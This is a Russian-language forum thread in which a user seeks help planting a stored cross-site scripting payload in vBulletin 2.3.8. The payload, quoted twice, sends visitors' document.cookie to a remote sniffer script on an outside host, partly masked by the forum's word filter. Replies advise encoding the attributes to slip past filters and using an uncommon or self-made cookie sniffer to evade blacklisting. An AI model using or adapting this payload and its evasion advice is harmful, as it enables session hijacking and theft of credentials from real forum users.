Проблема с XSS в vBulletin 2.x.x. Просьба помочь.
 

Такое дело прописываю эту xss(изложено в этой теме http://forum.antichat.ru/showthread.php?t=5469) в форуме vBulletin версии 2.3.8 а она заменяется на такую вот хню aaa@aaa.aa"'s='' sss="i=new Image(); i.src='http://********.ru/cgi-bin/s.jpg?'+document.****ie;this.sss=null" style=top:**********(****(this.sss));, появляются эти звёздочки. Кто нить может мне помочь, может её можно как нить запрятать.

Чуток не понятно что ты хочешь, но если тебе нужно обойти фильтры в параметрах...то используй эту ссылку для шифровки.

http://ha.ckers.org/xss.html

А вообще исходный код страницы дай.. :rolleyes:

Тыпрочитай тему которую я указал выше.

А где тут именно шифровать я не пойму?

тут... :rolleyes:

<p><font size="2" face="Verdana, Arial"><a href="mailto:aaa@aaa.aa"'s='">aaa@aaa.aa"'s='</a>' sss="i=new Image(); i.src='http://********.ru/cgi-bin/s.jpg?'+document.****ie;this.sss=null" style=top:**********(****(this.sss));</font></p>

http://ha.ckers.org/xss.html

Берешь эту ссылку, и кодируешь параметры своих атрибутов. :rolleyes:

А какой брать код HTML (with semicolons) или HTML (without semicolons)?

Не выходит, пишет как простой текст.

если заменяет на звездочки значит чел, фильтрует через фильтр матов, тоесть вписываешь туда слова и он их заменяет на *
Секешь к чему я?
если он такое делает, значит он обрезает твой сайт, допустим многие форумы стали добавлять в мат античатовский сниффер, решаеться это "навождение косых умов" очень просто, ищещь не распространненый особо сниффер, в конце концов можешь сделать сам. пробобуй здесь netsec.ru там тебе персональный сниф дадут